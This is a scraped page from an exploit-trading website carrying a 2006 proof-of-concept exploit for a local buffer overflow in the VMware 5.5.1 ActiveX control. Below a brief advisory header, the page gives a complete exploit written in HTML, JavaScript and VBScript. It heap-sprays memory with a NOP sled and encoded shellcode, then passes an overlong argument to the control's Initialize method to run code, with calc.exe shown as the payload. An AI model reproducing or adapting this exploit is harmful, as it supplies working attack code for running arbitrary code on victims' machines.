0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
VMware 5.5.1 (ActiveX) Local Buffer Overflow Exploit
==================================================== VMware 5.5.1 (ActiveX) Local Buffer Overflow Exploit ==================================================== /* ***************************************************************************************************************** $ An open security advisory #17 - VMWare ActiveX lame local overflow ***************************************************************************************************************** 1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com -+- www.open-security.org 2: Bug Released: August 18th or so... 2006 3: Bug Impact Rate: Code execution 4: Bug Scope Rate: Local ***************************************************************************************************************** $ This advisory and/or proof of concept code must not be used for commercial gain. ***************************************************************************************************************** VMWare http://vmware.com "Revolutionize software development, testing and deployment in your enterprise with powerful virtual machine software for developers and system administrators. VMware Workstation delivers powerful virtual machine software for the technical professional." Since this is a local only for ActiveX component, it requires being emailed or distribution via some p2p file share network or p2p chat networks. Pretty useless :) */ <html> <head> <title>WinXP Pro SP2 lame local VMWare Buffer Overflow</title> </head> <body> <center> <br> Discovered and developed by c0ntex - c0ntexb@gmail.com<br> Visit my website at http://www.open-security.org<br> <br> <h3> This will exploit overflow and execute calc.exe on WinXP Pro SP2<br> (fully patched) against VMWare 5.5.1 Initialize ActiveX member.<br> </h3> I have only found a bad solution to this bug. Due to the fact that<br> my controlling assembler is a call dword ptr[reg] I need to point<br> to a location I control, fine. However my payload is random pretty<br> much every run. Therefor I fill half a HUGE buffer with the address<br> (pointer) to my evil buffer, which them trampolines me to shellcode<br> <br> call ptr [reg]<br> [reg] -> 0xtrampoline<br> 0xtrampoline -> shellcode<br> <br> </center> <script> var buffa1 = unescape("%uedb0%u0d91") do { buffa1 += buffa1; } while (buffa1.length < 0x500000); var buffa2 = unescape("%u9090%u9090") do { buffa2 += buffa2; } while (buffa2.length < 0x800000); buffa1 += buffa2; buffa1 += unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" + "%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" + "%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" + "%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" + "%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" + "%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" + "%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" + "%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" + "%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" + "%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" + "%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" + "%uCC4A%uD0FF"); </script> <object id="target" classid="clsid:F76E4799-379B-4362-BCC4-68B753D10744"> </object> <script language="vbscript"> VmdbDb=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA VmdbPoll=200011744 target.Initialize VmdbDb, VmdbPoll </script> </body> # 0day.today [2024-12-24] #